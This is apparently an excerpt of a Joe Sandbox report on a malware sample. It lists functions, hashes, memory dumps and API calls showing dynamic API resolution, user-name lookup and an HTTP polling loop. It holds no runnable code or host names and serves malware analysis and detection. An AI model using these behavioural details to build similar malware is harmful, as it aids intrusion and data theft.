                  • Opcode ID: 5205245bdd5ec9b14474ca45e6ed78966b0e945eb3122924b82dd921de1100eb
                  • Instruction ID: 3b2cf77fcb84e2bc56e023ceb016af1d943efdfdf42f8e4fe46b57c27fd86b50
                  • Opcode Fuzzy Hash: 5205245bdd5ec9b14474ca45e6ed78966b0e945eb3122924b82dd921de1100eb
                  • Instruction Fuzzy Hash: C00186B1944208EFC700EFD4DD45BAABBB8F704B21F104219F645E3690D37859448BA1
                  Function 00887850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008711B7), ref: 00887880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0088789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 63d3bd21f59375b185e5e3d9bdbb316ad79f59c80579a0a41bdd6fccd0e4018f
                  • Instruction ID: 086a405b1fc9485e23104915dccc41b065b6f2028a2f2c1413dff90e57f5cbd2
                  • Opcode Fuzzy Hash: 63d3bd21f59375b185e5e3d9bdbb316ad79f59c80579a0a41bdd6fccd0e4018f
                  • Instruction Fuzzy Hash: CDF04FB2944208ABC700DFD8DD49FAEBBB8FB04721F10025AFA15E2690C77955058BA1
                  Function 00871160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 9260de09c41f17a84ec792a98a4dea6bf17d95d943ccaa0626e3e9a6fec9a82b
                  • Instruction ID: 8c604bde30741945cd6d85c5db616081e4a03a3662f1f3f2b5503024cc4a09d5
                  • Opcode Fuzzy Hash: 9260de09c41f17a84ec792a98a4dea6bf17d95d943ccaa0626e3e9a6fec9a82b
                  • Instruction Fuzzy Hash: 9BD05E7490430CDBCB00DFE0D8896DDBB78FB08321F001694D905A2351EA3194C2CBA6
                  Function 00889C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 889c10-889c1a 634 889c20-88a031 GetProcAddress * 43 633->634 635 88a036-88a0ca LoadLibraryA * 8 633->635 634->635 636 88a0cc-88a141 GetProcAddress * 5 635->636 637 88a146-88a14d 635->637 636->637 638 88a153-88a211 GetProcAddress * 8 637->638 639 88a216-88a21d 637->639 638->639 640 88a298-88a29f 639->640 641 88a21f-88a293 GetProcAddress * 5 639->641 642 88a2a5-88a332 GetProcAddress * 6 640->642 643 88a337-88a33e 640->643 641->640 642->643 644 88a41f-88a426 643->644 645 88a344-88a41a GetProcAddress * 9 643->645 646 88a428-88a49d GetProcAddress * 5 644->646 647 88a4a2-88a4a9 644->647 645->644 646->647 648 88a4ab-88a4d7 GetProcAddress * 2 647->648 649 88a4dc-88a4e3 647->649 648->649 650 88a515-88a51c 649->650 651 88a4e5-88a510 GetProcAddress * 2 649->651 652 88a612-88a619 650->652 653 88a522-88a60d GetProcAddress * 10 650->653 651->650 654 88a61b-88a678 GetProcAddress * 4 652->654 655 88a67d-88a684 652->655 653->652 654->655 656 88a69e-88a6a5 655->656 657 88a686-88a699 GetProcAddress 655->657 658 88a708-88a709 656->658 659 88a6a7-88a703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(75900000,015C67C0), ref: 00889C2D
                  • GetProcAddress.KERNEL32(75900000,015C6860), ref: 00889C45
                  • GetProcAddress.KERNEL32(75900000,015D8F70), ref: 00889C5E
                  • GetProcAddress.KERNEL32(75900000,015D8F88), ref: 00889C76
                  • GetProcAddress.KERNEL32(75900000,015DC868), ref: 00889C8E
                  • GetProcAddress.KERNEL32(75900000,015DC910), ref: 00889CA7
                  • GetProcAddress.KERNEL32(75900000,015CB1D0), ref: 00889CBF
                  • GetProcAddress.KERNEL32(75900000,015DCA78), ref: 00889CD7
                  • GetProcAddress.KERNEL32(75900000,015DC820), ref: 00889CF0
                  • GetProcAddress.KERNEL32(75900000,015DC9E8), ref: 00889D08
                  • GetProcAddress.KERNEL32(75900000,015DCAA8), ref: 00889D20
                  • GetProcAddress.KERNEL32(75900000,015C6720), ref: 00889D39
                  • GetProcAddress.KERNEL32(75900000,015C68C0), ref: 00889D51
                  • GetProcAddress.KERNEL32(75900000,015C68E0), ref: 00889D69
                  • GetProcAddress.KERNEL32(75900000,015C6800), ref: 00889D82
                  • GetProcAddress.KERNEL32(75900000,015DC838), ref: 00889D9A
                  • GetProcAddress.KERNEL32(75900000,015DC850), ref: 00889DB2
                  • GetProcAddress.KERNEL32(75900000,015CB220), ref: 00889DCB
                  • GetProcAddress.KERNEL32(75900000,015C6940), ref: 00889DE3
                  • GetProcAddress.KERNEL32(75900000,015DC7F0), ref: 00889DFB
                  • GetProcAddress.KERNEL32(75900000,015DC970), ref: 00889E14
                  • GetProcAddress.KERNEL32(75900000,015DC940), ref: 00889E2C
                  • GetProcAddress.KERNEL32(75900000,015DC880), ref: 00889E44
                  • GetProcAddress.KERNEL32(75900000,015C6960), ref: 00889E5D
                  • GetProcAddress.KERNEL32(75900000,015DC958), ref: 00889E75
                  • GetProcAddress.KERNEL32(75900000,015DC8F8), ref: 00889E8D
                  • GetProcAddress.KERNEL32(75900000,015DC988), ref: 00889EA6
                  • GetProcAddress.KERNEL32(75900000,015DCA18), ref: 00889EBE
                  • GetProcAddress.KERNEL32(75900000,015DC898), ref: 00889ED6
                  • GetProcAddress.KERNEL32(75900000,015DC8B0), ref: 00889EEF
                  • GetProcAddress.KERNEL32(75900000,015DCA30), ref: 00889F07
                  • GetProcAddress.KERNEL32(75900000,015DCA60), ref: 00889F1F
                  • GetProcAddress.KERNEL32(75900000,015DC8C8), ref: 00889F38
                  • GetProcAddress.KERNEL32(75900000,015D9918), ref: 00889F50
                  • GetProcAddress.KERNEL32(75900000,015DC8E0), ref: 00889F68
                  • GetProcAddress.KERNEL32(75900000,015DC928), ref: 00889F81
                  • GetProcAddress.KERNEL32(75900000,015C6A00), ref: 00889F99
                  • GetProcAddress.KERNEL32(75900000,015DC9A0), ref: 00889FB1
                  • GetProcAddress.KERNEL32(75900000,015C6760), ref: 00889FCA
                  • GetProcAddress.KERNEL32(75900000,015DCA90), ref: 00889FE2
                  • GetProcAddress.KERNEL32(75900000,015DC9B8), ref: 00889FFA
                  • GetProcAddress.KERNEL32(75900000,015C6500), ref: 0088A013
                  • GetProcAddress.KERNEL32(75900000,015C65C0), ref: 0088A02B
                  • LoadLibraryA.KERNEL32(015DC808,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A03D
                  • LoadLibraryA.KERNEL32(015DCAD8,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A04E
                  • LoadLibraryA.KERNEL32(015DC9D0,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A060
                  • LoadLibraryA.KERNEL32(015DCAC0,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A072
                  • LoadLibraryA.KERNEL32(015DCA00,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A083
                  • LoadLibraryA.KERNEL32(015DCA48,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A095
                  • LoadLibraryA.KERNEL32(015DCB50,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A0A7
                  • LoadLibraryA.KERNEL32(015DCD48,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A0B8
                  • GetProcAddress.KERNEL32(75FD0000,015C6520), ref: 0088A0DA
                  • GetProcAddress.KERNEL32(75FD0000,015DCB20), ref: 0088A0F2
                  • GetProcAddress.KERNEL32(75FD0000,015D8970), ref: 0088A10A
                  • GetProcAddress.KERNEL32(75FD0000,015DCDC0), ref: 0088A123
                  • GetProcAddress.KERNEL32(75FD0000,015C6440), ref: 0088A13B
                  • GetProcAddress.KERNEL32(735C0000,015CB270), ref: 0088A160
                  • GetProcAddress.KERNEL32(735C0000,015C63E0), ref: 0088A179
                  • GetProcAddress.KERNEL32(735C0000,015CB130), ref: 0088A191
                  • GetProcAddress.KERNEL32(735C0000,015DCD90), ref: 0088A1A9
                  • GetProcAddress.KERNEL32(735C0000,015DCBC8), ref: 0088A1C2
                  • GetProcAddress.KERNEL32(735C0000,015C6480), ref: 0088A1DA
                  • GetProcAddress.KERNEL32(735C0000,015C64E0), ref: 0088A1F2
                  • GetProcAddress.KERNEL32(735C0000,015DCD60), ref: 0088A20B
                  • GetProcAddress.KERNEL32(763B0000,015C65E0), ref: 0088A22C
                  • GetProcAddress.KERNEL32(763B0000,015C62A0), ref: 0088A244
                  • GetProcAddress.KERNEL32(763B0000,015DCB98), ref: 0088A25D
                  • GetProcAddress.KERNEL32(763B0000,015DCB68), ref: 0088A275
                  • GetProcAddress.KERNEL32(763B0000,015C65A0), ref: 0088A28D
                  • GetProcAddress.KERNEL32(750F0000,015CAF00), ref: 0088A2B3
                  • GetProcAddress.KERNEL32(750F0000,015CB018), ref: 0088A2CB
                  • GetProcAddress.KERNEL32(750F0000,015DCC70), ref: 0088A2E3
                  • GetProcAddress.KERNEL32(750F0000,015C62C0), ref: 0088A2FC
                  • GetProcAddress.KERNEL32(750F0000,015C64C0), ref: 0088A314
                  • GetProcAddress.KERNEL32(750F0000,015CAF78), ref: 0088A32C
                  • GetProcAddress.KERNEL32(75A50000,015DCDD8), ref: 0088A352
                  • GetProcAddress.KERNEL32(75A50000,015C6540), ref: 0088A36A
                  • GetProcAddress.KERNEL32(75A50000,015D89E0), ref: 0088A382
                  • GetProcAddress.KERNEL32(75A50000,015DCAF0), ref: 0088A39B
                  • GetProcAddress.KERNEL32(75A50000,015DCD00), ref: 0088A3B3
                  • GetProcAddress.KERNEL32(75A50000,015C6380), ref: 0088A3CB
                  • GetProcAddress.KERNEL32(75A50000,015C6460), ref: 0088A3E4
                  • GetProcAddress.KERNEL32(75A50000,015DCC28), ref: 0088A3FC
                  • GetProcAddress.KERNEL32(75A50000,015DCC10), ref: 0088A414
                  • GetProcAddress.KERNEL32(75070000,015C63A0), ref: 0088A436
                  • GetProcAddress.KERNEL32(75070000,015DCD30), ref: 0088A44E
                  • GetProcAddress.KERNEL32(75070000,015DCCD0), ref: 0088A466
                  • GetProcAddress.KERNEL32(75070000,015DCB38), ref: 0088A47F
                  • GetProcAddress.KERNEL32(75070000,015DCD18), ref: 0088A497
                  • GetProcAddress.KERNEL32(74E50000,015C6560), ref: 0088A4B8
                  • GetProcAddress.KERNEL32(74E50000,015C6340), ref: 0088A4D1
                  • GetProcAddress.KERNEL32(75320000,015C6640), ref: 0088A4F2
                  • GetProcAddress.KERNEL32(75320000,015DCB80), ref: 0088A50A
                  • GetProcAddress.KERNEL32(6F060000,015C6300), ref: 0088A530
                  • GetProcAddress.KERNEL32(6F060000,015C64A0), ref: 0088A548
                  • GetProcAddress.KERNEL32(6F060000,015C6600), ref: 0088A560
                  • GetProcAddress.KERNEL32(6F060000,015DCB08), ref: 0088A579
                  • GetProcAddress.KERNEL32(6F060000,015C6580), ref: 0088A591
                  • GetProcAddress.KERNEL32(6F060000,015C6620), ref: 0088A5A9
                  • GetProcAddress.KERNEL32(6F060000,015C6660), ref: 0088A5C2
                  • GetProcAddress.KERNEL32(6F060000,015C62E0), ref: 0088A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0088A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0088A607
                  • GetProcAddress.KERNEL32(74E00000,015DCBB0), ref: 0088A629
                  • GetProcAddress.KERNEL32(74E00000,015D87F0), ref: 0088A641
                  • GetProcAddress.KERNEL32(74E00000,015DCBF8), ref: 0088A659
                  • GetProcAddress.KERNEL32(74E00000,015DCD78), ref: 0088A672
                  • GetProcAddress.KERNEL32(74DF0000,015C6280), ref: 0088A693
                  • GetProcAddress.KERNEL32(6F9C0000,015DCCE8), ref: 0088A6B4
                  • GetProcAddress.KERNEL32(6F9C0000,015C6320), ref: 0088A6CD
                  • GetProcAddress.KERNEL32(6F9C0000,015DCBE0), ref: 0088A6E5
                  • GetProcAddress.KERNEL32(6F9C0000,015DCDA8), ref: 0088A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: d89504c7227499eb8f51b3f024be0fd5a022e736f058c315b48796cdaa2b62b7
                  • Instruction ID: 42076c22eb6120eccbd8fcbb990e4822d0276b06cbab531d4ee3fd562e816c7d
                  • Opcode Fuzzy Hash: d89504c7227499eb8f51b3f024be0fd5a022e736f058c315b48796cdaa2b62b7
                  • Instruction Fuzzy Hash: 27622EB6508240AFC354DFE8FD989563BF9F76C301B14871AA609C3676DA3A9483DF12
                  Function 00876280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 876280-87630b call 88a7a0 call 8747b0 call 88a740 InternetOpenA StrCmpCA 1040 876314-876318 1033->1040 1041 87630d 1033->1041 1042 87631e-876342 InternetConnectA 1040->1042 1043 876509-876525 call 88a7a0 call 88a800 * 2 1040->1043 1041->1040 1045 8764ff-876503 InternetCloseHandle 1042->1045 1046 876348-87634c 1042->1046 1062 876528-87652d 1043->1062 1045->1043 1048 87634e-876358 1046->1048 1049 87635a 1046->1049 1050 876364-876392 HttpOpenRequestA 1048->1050 1049->1050 1052 8764f5-8764f9 InternetCloseHandle 1050->1052 1053 876398-87639c 1050->1053 1052->1045 1055 8763c5-876405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 87639e-8763bf InternetSetOptionA 1053->1056 1058 876407-876427 call 88a740 call 88a800 * 2 1055->1058 1059 87642c-87644b call 888940 1055->1059 1056->1055 1058->1062 1067 87644d-876454 1059->1067 1068 8764c9-8764e9 call 88a740 call 88a800 * 2 1059->1068 1071 8764c7-8764ef InternetCloseHandle 1067->1071 1072 876456-876480 InternetReadFile 1067->1072 1068->1062 1071->1052 1073 876482-876489 1072->1073 1074 87648b 1072->1074 1073->1074 1078 87648d-8764c5 call 88a9b0 call 88a8a0 call 88a800 1073->1078 1074->1071 1078->1072
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • InternetOpenA.WININET(00890DFE,00000001,00000000,00000000,00000000), ref: 008762E1
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00876335
                  • HttpOpenRequestA.WININET(00000000,GET,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00876385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008763BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008763D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008763FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0087646D
                  • InternetCloseHandle.WININET(00000000), ref: 008764EF
                  • InternetCloseHandle.WININET(00000000), ref: 008764F9
                  • InternetCloseHandle.WININET(00000000), ref: 00876503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 1b068326fb59985999dc4647695727015c56a99ba0435f877f11a5c9e858da2a
                  • Instruction ID: f004f4f53e5232504655ba58b56c21c2b508801b45eed582323d6fd0d4d6e85a
                  • Opcode Fuzzy Hash: 1b068326fb59985999dc4647695727015c56a99ba0435f877f11a5c9e858da2a
                  • Instruction Fuzzy Hash: 6C712F71A00218ABEF14EBE4DC49BEE7774FB44700F108199F509AB1D5EBB4AA85CF52
                  Function 00885510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 885510-885577 call 885ad0 call 88a820 * 3 call 88a740 * 4 1106 88557c-885583 1090->1106 1107 885585-8855b6 call 88a820 call 88a7a0 call 871590 call 8851f0 1106->1107 1108 8855d7-88564c call 88a740 * 2 call 871590 call 8852c0 call 88a8a0 call 88a800 call 88aad0 StrCmpCA 1106->1108 1123 8855bb-8855d2 call 88a8a0 call 88a800 1107->1123 1134 885693-8856a9 call 88aad0 StrCmpCA 1108->1134 1138 88564e-88568e call 88a7a0 call 871590 call 8851f0 call 88a8a0 call 88a800 1108->1138 1123->1134 1139 8857dc-885844 call 88a8a0 call 88a820 * 2 call 871670 call 88a800 * 4 call 886560 call 871550 1134->1139 1140 8856af-8856b6 1134->1140 1138->1134 1269 885ac3-885ac6 1139->1269 1142 8857da-88585f call 88aad0 StrCmpCA 1140->1142 1143 8856bc-8856c3 1140->1143 1162 885991-8859f9 call 88a8a0 call 88a820 * 2 call 871670 call 88a800 * 4 call 886560 call 871550 1142->1162 1163 885865-88586c 1142->1163 1146 88571e-885793 call 88a740 * 2 call 871590 call 8852c0 call 88a8a0 call 88a800 call 88aad0 StrCmpCA 1143->1146 1147 8856c5-885719 call 88a820 call 88a7a0 call 871590 call 8851f0 call 88a8a0 call 88a800 1143->1147 1146->1142 1246 885795-8857d5 call 88a7a0 call 871590 call 8851f0 call 88a8a0 call 88a800 1146->1246 1147->1142 1162->1269 1168 88598f-885a14 call 88aad0 StrCmpCA 1163->1168 1169 885872-885879 1163->1169 1198 885a28-885a91 call 88a8a0 call 88a820 * 2 call 871670 call 88a800 * 4 call 886560 call 871550 1168->1198 1199 885a16-885a21 Sleep 1168->1199 1175 88587b-8858ce call 88a820 call 88a7a0 call 871590 call 8851f0 call 88a8a0 call 88a800 1169->1175 1176 8858d3-885948 call 88a740 * 2 call 871590 call 8852c0 call 88a8a0 call 88a800 call 88aad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 88594a-88598a call 88a7a0 call 871590 call 8851f0 call 88a8a0 call 88a800 1176->1274 1198->1269 1199->1106 1246->1142 1274->1168
                  APIs
                    • Part of subcall function 0088A820: lstrlen.KERNEL32(00874F05,?,?,00874F05,00890DDE), ref: 0088A82B
                    • Part of subcall function 0088A820: lstrcpy.KERNEL32(00890DDE,00000000), ref: 0088A885
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008856A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885857
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885228
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 008852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885318
                    • Part of subcall function 008852C0: lstrlen.KERNEL32(00000000), ref: 0088532F
                    • Part of subcall function 008852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00885364
                    • Part of subcall function 008852C0: lstrlen.KERNEL32(00000000), ref: 00885383
                    • Part of subcall function 008852C0: lstrlen.KERNEL32(00000000), ref: 008853AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0088578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00885940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00885A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: b474d22184451e114ac10874c894a0dcc71762f74e21f76d10f5ad687caf6226
